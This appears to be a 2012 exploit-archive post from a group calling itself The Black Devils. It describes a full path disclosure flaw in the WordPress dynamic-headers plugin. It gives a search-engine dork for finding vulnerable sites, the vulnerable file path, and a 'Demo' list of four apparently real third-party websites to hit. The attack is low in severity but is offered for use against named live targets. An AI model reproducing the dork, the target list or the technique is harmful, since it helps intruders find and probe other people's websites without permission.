# Exploit Title: Wordpress dynamic-headers plugin Full Path Disclosure vulnerability
# Date: 08/01/2012
# Author: The Black Devils
# Category : [ webapps ]
# Vendor : http://wordpress.org/extend/plugins/dynamic-headers/
# Type : php
# Tested on: [Windows] & [Ubuntu]
# Dork : inurl:"/plugins/dynamic-headers/"
#------------------
http://localhost/wp-content/plugins/dynamic-headers/custom-header.php
Demo
http://www.base23.se/wp-content/plugins/dynamic-headers/custom-header.php
http://egi44.fr/site/wp-content/plugins/dynamic-headers/custom-header.php
http://pericajerkovic.com/wp-content/plugins/dynamic-headers/custom-header.php
http://www.welchcreativegroup.com/wp-content/plugins/dynamic-headers/custom-header.php
#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information